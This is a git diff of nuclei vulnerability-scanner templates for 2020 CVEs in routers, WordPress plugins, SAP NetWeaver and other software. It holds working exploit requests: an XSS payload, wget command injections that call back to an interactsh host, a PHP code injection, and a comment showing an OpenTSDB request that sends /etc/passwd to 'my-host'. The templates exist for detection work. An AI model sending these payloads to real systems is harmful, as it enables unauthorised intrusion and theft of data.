description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, - Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. + description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. + tags: cve,cve2020,netgear,auth-bypass reference: - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ @@ -13,10 +13,9 @@ info: - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2020-27866 cwe-id: CWE-288 - tags: cve,cve2020,netgear,auth-bypass requests: - raw: diff --git a/nuclei-templates/CVE-2020/CVE-2020-27982.yaml b/nuclei-templates/CVE-2020/CVE-2020-27982.yaml deleted file mode 100644 index 2b7a6b2741..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-27982.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-27982 - -info: - name: IceWarp WebMail Reflected XSS - author: madrobot - severity: medium - description: IceWarp 11.4.5.0 allows XSS via the language parameter. - reference: - - https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html - - http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html - - https://cxsecurity.com/issue/WLB-2020100161 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-27982 - cwe-id: CWE-79 - tags: cve,cve2020,xss,icewarp - -requests: - - method: GET - path: - - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-28188.yaml b/nuclei-templates/CVE-2020/CVE-2020-28188.yaml deleted file mode 100644 index ef78a1e202..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-28188.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-28188 - -info: - name: TerraMaster TOS - Unauthenticated Remote Command Execution - author: gy741 - severity: critical - description: TerraMaster TOS <= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter. - reference: - - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - - https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-28188 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-28188 - cwe-id: CWE-78 - tags: cve,cve2020,terramaster,rce,oast,mirai,unauth - -requests: - - raw: - - | - GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 - Host: {{Hostname}} - - - | - GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/03/27 diff --git a/nuclei-templates/CVE-2020/CVE-2020-28208.yaml b/nuclei-templates/CVE-2020/CVE-2020-28208.yaml deleted file mode 100644 index 6e4100be64..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-28208.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2020-28208 - -info: - name: RocketChat Unauthenticated Email enumeration - author: pdteam - severity: medium - description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. - reference: - - https://trovent.io/security-advisory-2010-01 - - https://trovent.github.io/security-advisories/TRSA-2010-01/TRSA-2010-01.txt - - http://www.openwall.com/lists/oss-security/2021/01/07/1 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2020-28208 - cwe-id: CWE-203 - tags: cve,cve2020,rocketchat - -requests: - - raw: - - | - POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/json - - {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '"result\":false' - - '"success":true' - part: body - condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-29164.yaml b/nuclei-templates/CVE-2020/CVE-2020-29164.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-29164.yaml rename to nuclei-templates/CVE-2020/CVE-2020-29164.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-29453.yaml b/nuclei-templates/CVE-2020/CVE-2020-29453.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-29453.yaml rename to nuclei-templates/CVE-2020/CVE-2020-29453.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-35234.yaml b/nuclei-templates/CVE-2020/CVE-2020-35234.yaml deleted file mode 100644 index 62acb0ba37..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-35234.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-35234 - -info: - name: SMTP WP Plugin Directory Listing - author: PR3R00T - severity: high - description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 - - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ - - https://wordpress.org/plugins/easy-wp-smtp/#developers - remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-35234 - cwe-id: CWE-532 - tags: cve,cve2020,wordpress,wp-plugin,smtp - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" - - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/" - - matchers: - - type: word - words: - - "debug" - - "log" - - "Index of" - condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-35338.yaml b/nuclei-templates/CVE-2020/CVE-2020-35338.yaml new file mode 100644 index 0000000000..5da111aa7e --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-35338.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-35338 + +info: + name: Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection + author: Jeya Seelan + severity: critical + description: Wireless Multiplex Terminal Playout Server <=20.2.8 has a default account with a password of pokon available via its web administrative interface. + reference: + - https://jeyaseelans.medium.com/cve-2020-35338-9e841f48defa + - https://nvd.nist.gov/vuln/detail/CVE-2020-35338 + - https://www.mobileviewpoint.com/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-35338 + cwe-id: CWE-798 + tags: cve,cve2020,wmt,default-login + +requests: + - method: GET + path: + - "{{BaseURL}}/server/" + headers: + Authorization: "Basic OnBva29u" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WMT Server playout" + +# Enhanced by mp on 2022/04/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-35476.yaml b/nuclei-templates/CVE-2020/CVE-2020-35476.yaml index 89376f3904..a84417bce6 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35476.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35476.yaml @@ -1,19 +1,20 @@ id: CVE-2020-35476 info: - name: OpenTSDB <= 2.4.0 - Remote Code Execution + name: OpenTSDB 2.4.0 Remote Code Execution author: pikpikcu severity: critical - description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory." - reference: - - https://github.com/OpenTSDB/opentsdb/issues/2051 - - https://nvd.nist.gov/vuln/detail/CVE-2020-35476 + description: A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. + reference: https://github.com/OpenTSDB/opentsdb/issues/2051 + tags: cve,cve2020,opentsdb,rce + + # Extracting /etc/passwd to remote host:- + # /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20--post-file%20/etc/passwd%20http://my-host%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-35476 cwe-id: CWE-78 - tags: cve,cve2020,opentsdb,rce requests: - method: GET @@ -36,6 +37,4 @@ requests: - type: word words: - application/json - part: header - -# Enhanced by mp on 2022/04/28 + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-35489.yaml b/nuclei-templates/CVE-2020/CVE-2020-35489.yaml index 155184683f..1ff117a1d1 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35489.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35489.yaml @@ -1,40 +1,23 @@ id: CVE-2020-35489 info: - name: WordPress Contact Form 7 - Unrestricted File Upload + name: WordPress Contact Form 7 Plugin - Unrestricted File Upload author: soyelmago severity: critical - description: WordPress Contact Form 7 before 5.3.2 allows unrestricted file upload and remote code execution because a filename may contain special characters. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-35489 - - https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload/ - - https://wordpress.org/plugins/contact-form-7/#developers - - https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/ + description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters. + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35489 + tags: cve,cve2020,wordpress,wp-plugin,rce,upload classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-score: 10.00 cve-id: CVE-2020-35489 cwe-id: CWE-434 - tags: cve,cve2020,wordpress,wp-plugin,rce,upload requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - matchers-condition: and matchers: - type: status @@ -42,14 +25,17 @@ requests: - 200 - type: word - part: body words: - "Contact Form 7" - - '== Changelog ==' - condition: and + part: body - - type: dsl - dsl: - - compare_versions(version, '< 5.3.2') + - type: regex + regex: + - '^== Changelog =="' + part: body -# Enhanced by mp on 2022/04/28 + - type: regex + regex: + - '^= (5\.3\.[2-9]+|5\.[4-9]+\.|[6-9]\.[0-9]+\.[0-9]+|1[0-9]+\.) =' + negative: true + part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-35713.yaml b/nuclei-templates/CVE-2020/CVE-2020-35713.yaml new file mode 100644 index 0000000000..42dbf98178 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-35713.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-35713 + +info: + name: Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution + author: gy741 + severity: critical + description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. + reference: + - https://downloads.linksys.com/support/assets/releasenotes/ExternalReleaseNotes_RE6500_1.0.012.001.txt + - https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-35713 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-35713 + cwe-id: CWE-78 + tags: cve,cve2020,linksys,rce,oast,router + +requests: + - raw: + - | + POST /goform/setSysAdm HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Origin: {{BaseURL}} + Referer: {{BaseURL}}/login.shtml + + admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1 + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/04/28 diff --git a/nuclei-templates/CVE-2020/cve-2020-35729.yaml b/nuclei-templates/CVE-2020/CVE-2020-35729.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-35729.yaml rename to nuclei-templates/CVE-2020/CVE-2020-35729.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-3580.yaml b/nuclei-templates/CVE-2020/CVE-2020-3580.yaml index 08cc4d4556..8b32f9ef9f 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-3580.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-3580.yaml @@ -4,18 +4,17 @@ info: name: Cisco ASA XSS author: pikpikcu severity: medium - description: | - Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-3580 - https://twitter.com/ptswarm/status/1408050644460650502 - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe + description: | + Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section. + tags: cve,cve2020,xss,cisco classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-3580 cwe-id: CWE-79 - tags: cve,cve2020,xss,cisco requests: - raw: diff --git a/nuclei-templates/CVE-2020/CVE-2020-35848.yaml b/nuclei-templates/CVE-2020/CVE-2020-35848.yaml index 703b0efb37..b560962774 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35848.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35848.yaml @@ -1,21 +1,19 @@ id: CVE-2020-35848 info: - name: Agentejo Cockpit <0.12.0 - NoSQL Injection + name: Cockpit prior to 0.12.0 NoSQL injection in /auth/newpassword author: dwisiswant0 severity: critical - description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form. - reference: - - https://swarm.ptsecurity.com/rce-cockpit-cms/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-35848 - - https://getcockpit.com/ - - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + description: | + newpassword method of the Auth controller, + which is responsible for displaying the user password reset form. + reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ + tags: cve,cve2020,nosqli,sqli,cockpit,injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-35848 cwe-id: CWE-89 - tags: cve,cve2020,nosqli,sqli,cockpit,injection requests: - method: POST @@ -35,5 +33,3 @@ requests: part: body regex: - 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"' - -# Enhanced by mp on 2022/04/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-35951.yaml b/nuclei-templates/CVE-2020/CVE-2020-35951.yaml index 72b76b1df4..0ab49a2bc9 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-35951.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-35951.yaml @@ -1,20 +1,18 @@ id: CVE-2020-35951 info: - name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion + name: Wordpress Quiz and Survey Master Arbitrary File Deletion author: princechaddha severity: critical - description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). - reference: - - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ - - https://nvd.nist.gov/vuln/detail/CVE-2020-35951 - - https://wpscan.com/vulnerability/10348 + description: | + An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files). + reference: https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ + tags: cve,cve2020,wordpress,wp-plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H - cvss-score: 9.9 + cvss-score: 9.90 cve-id: CVE-2020-35951 cwe-id: CWE-306 - tags: cve,cve2020,wordpress,wp-plugin requests: - raw: @@ -66,6 +64,4 @@ requests: - type: dsl dsl: - - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" - -# Enhanced by mp on 2022/04/28 + - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-36112.yaml b/nuclei-templates/CVE-2020/CVE-2020-36112.yaml index a74b3f8fa0..474b9b212a 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-36112.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-36112.yaml @@ -1,20 +1,19 @@ id: CVE-2020-36112 info: - name: CSE Bookstore 1.0 - SQL Injection + name: CSE Bookstore 1.0 SQL Injection author: geeknik - severity: critical - description: "CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database." + description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. reference: - https://www.exploit-db.com/exploits/49314 - https://www.tenable.com/cve/CVE-2020-36112 - - https://nvd.nist.gov/vuln/detail/CVE-2020-36112 + severity: critical + tags: cve,cve2020,sqli,cse classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2020-36112 cwe-id: CWE-89 - tags: cve,cve2020,sqli,cse requests: - raw: @@ -29,5 +28,3 @@ requests: - "get book price failed! You have an error in your SQL syntax" - "Can't retrieve data You have an error in your SQL syntax" condition: or - -# Enhanced by mp on 2022/04/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-4463.yaml b/nuclei-templates/CVE-2020/CVE-2020-4463.yaml deleted file mode 100644 index c99ffbcccc..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-4463.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2020-4463 - -info: - name: IBM Maximo Asset Management Information Disclosure via XXE - author: dwisiswant0 - severity: high - description: | - IBM Maximo Asset Management is vulnerable to an - XML External Entity Injection (XXE) attack when processing XML data. - A remote attacker could exploit this vulnerability to expose - sensitive information or consume memory resources. - reference: - - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - - https://github.com/Ibonok/CVE-2020-4463 - - https://exchange.xforce.ibmcloud.com/vulnerabilities/181484 - - https://www.ibm.com/support/pages/node/6253953 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L - cvss-score: 8.2 - cve-id: CVE-2020-4463 - cwe-id: CWE-611 - tags: cve,cve2020,ibm,xxe,disclosure - -requests: - - method: POST - path: - - "{{BaseURL}}/os/mxperson" - - "{{BaseURL}}/meaweb/os/mxperson" - body: | - <?xml version='1.0' encoding='UTF-8'?> - <max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'> - <max:MXPERSONQuery></max:MXPERSONQuery> - </max:QueryMXPERSON> - headers: - Content-Type: application/xml - matchers-condition: and - matchers: - - type: word - words: - - "application/xml" - part: header - - type: word - words: - - "QueryMXPERSONResponse" - - "MXPERSONSet" - part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-5284.yaml b/nuclei-templates/CVE-2020/CVE-2020-5284.yaml new file mode 100644 index 0000000000..ea57a1a846 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-5284.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-5284 + +info: + name: Next.js .next/ limited path traversal + author: rootxharsh,iamnoooob,dwisiswant0 + severity: medium + description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2. + reference: + - https://github.com/zeit/next.js/releases/tag/v9.3.2 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj + - https://github.com/zeit/next.js/releases/tag/v9.3.2 + - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2020-5284 + cwe-id: CWE-22 + tags: cve,cve2020,nextjs,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/_next/static/../server/pages-manifest.json" + matchers-condition: and + matchers: + - type: regex + regex: + - '\{"/_app":".*?_app\.js"' + part: body + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-5410.yaml b/nuclei-templates/CVE-2020/CVE-2020-5410.yaml index 961138c552..e8a81af7f6 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-5410.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-5410.yaml @@ -4,16 +4,14 @@ info: name: Directory Traversal in Spring Cloud Config Server author: mavericknerd severity: high - description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server - module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. - reference: - - https://tanzu.vmware.com/security/cve-2020-5410 + description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. + reference: https://tanzu.vmware.com/security/cve-2020-5410 + tags: cve,cve2020,lfi,springcloud,config,traversal classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2020-5410 cwe-id: CWE-22 - tags: cve,cve2020,lfi,springcloud,config,traversal requests: - method: GET diff --git a/nuclei-templates/CVE-2020/CVE-2020-5775.yaml b/nuclei-templates/CVE-2020/CVE-2020-5775.yaml index 1df2face75..11b344641d 100644 --- a/nuclei-templates/CVE-2020/CVE-2020-5775.yaml +++ b/nuclei-templates/CVE-2020/CVE-2020-5775.yaml @@ -8,12 +8,12 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-5775 - https://www.tenable.com/security/research/tra-2020-49 + tags: cve,cve2020,ssrf,oast,blind classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N - cvss-score: 5.8 + cvss-score: 5.80 cve-id: CVE-2020-5775 cwe-id: CWE-918 - tags: cve,cve2020,ssrf,oast,blind requests: - method: GET diff --git a/nuclei-templates/CVE-2020/cve-2020-5777.yaml b/nuclei-templates/CVE-2020/CVE-2020-5777.yaml similarity index 100% rename from nuclei-templates/CVE-2020/cve-2020-5777.yaml rename to nuclei-templates/CVE-2020/CVE-2020-5777.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-5847.yaml b/nuclei-templates/CVE-2020/CVE-2020-5847.yaml deleted file mode 100644 index ab67f38404..0000000000 --- a/nuclei-templates/CVE-2020/CVE-2020-5847.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2020-5847 - -info: - name: UnRaid <=6.80 - Remote Code Execution - author: madrobot - severity: critical - description: UnRaid <=6.80 allows remote unauthenticated attackers to execute arbitrary code. - reference: - - https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847 - - https://sysdream.com/news/lab/ - - https://forums.unraid.net/forum/7-announcements/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-5847 - cwe-id: CWE-94,CWE-668 - tags: cve,cve2020,rce - -requests: - - method: GET - path: - - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - -# Enhanced by mp on 2022/04/28 diff --git a/nuclei-templates/CVE-2020/CVE-2020-6287.yaml b/nuclei-templates/CVE-2020/CVE-2020-6287.yaml new file mode 100644 index 0000000000..f6c7fa6455 --- /dev/null +++ b/nuclei-templates/CVE-2020/CVE-2020-6287.yaml @@ -0,0 +1,55 @@ +id: CVE-2020-6287 + +info: + name: SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition + author: dwisiswant0 + severity: critical + description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system. + reference: + - https://launchpad.support.sap.com/#/notes/2934135 + - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 + - https://www.onapsis.com/recon-sap-cyber-security-vulnerability + - https://github.com/chipik/SAP_RECON + - https://nvd.nist.gov/vuln/detail/CVE-2020-6287 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2020-6287 + cwe-id: CWE-306 + tags: cve,cve2020,sap + +requests: + - raw: + - | + POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=UTF-8 + Connection: close + + <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData> + 